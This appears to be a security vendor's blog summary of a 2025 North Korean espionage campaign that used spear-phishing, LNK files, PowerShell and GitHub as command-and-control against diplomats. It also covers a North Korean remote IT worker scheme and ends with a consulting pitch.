North Korean cyber actors have been implicated in a sophisticated espionage campaign targeting diplomatic missions, utilizing GitHub as a covert command-and-control channel. The attacks, which ran from March to July 2025, involved spear-phishing emails designed to trick embassy staff and foreign ministry personnel into downloading malicious files. This campaign highlights the evolving tactics of state-sponsored hacking groups.

Key Takeaways

• North Korean threat actors, likely Kimsuky, are using GitHub for cyber espionage against diplomatic targets.

• Spear-phishing emails impersonate trusted contacts, delivering malware via cloud storage services like Dropbox and Daum Cloud.

• The malware used is a variant of Xeno RAT, known as MoonPeak.

• The campaign shows operational similarities to Chinese APT groups, suggesting potential collaboration or influence.

• A separate North Korean scheme involves IT workers infiltrating companies, using AI tools and deepfakes to generate illicit revenue.

Diplomatic Espionage Campaign

The cyber espionage campaign saw North Korean threat actors send at least 19 spear-phishing emails. These emails were carefully crafted to impersonate trusted diplomatic contacts, offering convincing meeting invitations, official letters, and event details. The primary goal was to lure recipients into opening password-protected ZIP files hosted on cloud storage platforms such as Dropbox, Google Drive, and Daum Cloud.

Trellix researchers noted that GitHub, a platform typically used by developers, was leveraged as a covert command-and-control channel. The infection chains relied on trusted cloud storage solutions to deliver a variant of the Xeno RAT, dubbed MoonPeak, which grants attackers control over compromised systems. While the infrastructure and tactics overlap with known North Korean groups like Kimsuky, some indicators suggest potential involvement of China-based operatives.

The malicious ZIP archives contained Windows shortcut files (.LNK) disguised as PDF documents. Executing these files triggered PowerShell code that fetched further stages of malware from GitHub and established persistence through scheduled tasks. A decoy document was also presented to victims to mask the malicious activity. The attackers also harvested system information and exfiltrated it to a private GitHub repository, from which they could update a text file to rotate payloads and deploy new malware.

Links to China and IT Worker Scheme

Analysis of the attackers' activity revealed that a significant portion originated from a timezone consistent with China, with a smaller portion aligning with the Koreas. A notable pause in activity coincided with Chinese national holidays, further fueling speculation about Chinese involvement. This has led to several possibilities: North Korean operatives working from China, a Chinese APT mimicking Kimsuky, or a collaborative effort for intelligence gathering.

This campaign's disclosure coincides with findings from CrowdStrike, which identified over 320 incidents in the past year where North Koreans posed as remote IT workers. These individuals infiltrated companies to generate illicit revenue for the regime, a 220% increase from the previous year. This scheme, tracked as Famous Chollima and Jasper Sleet, reportedly uses generative AI coding assistants and deepfake technology to enhance their operations and evade detection. These IT workers often hold multiple jobs simultaneously and recruit individuals to manage laptop farms for remote work, mimicking the presence of employees within target countries.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms, The Hacker News.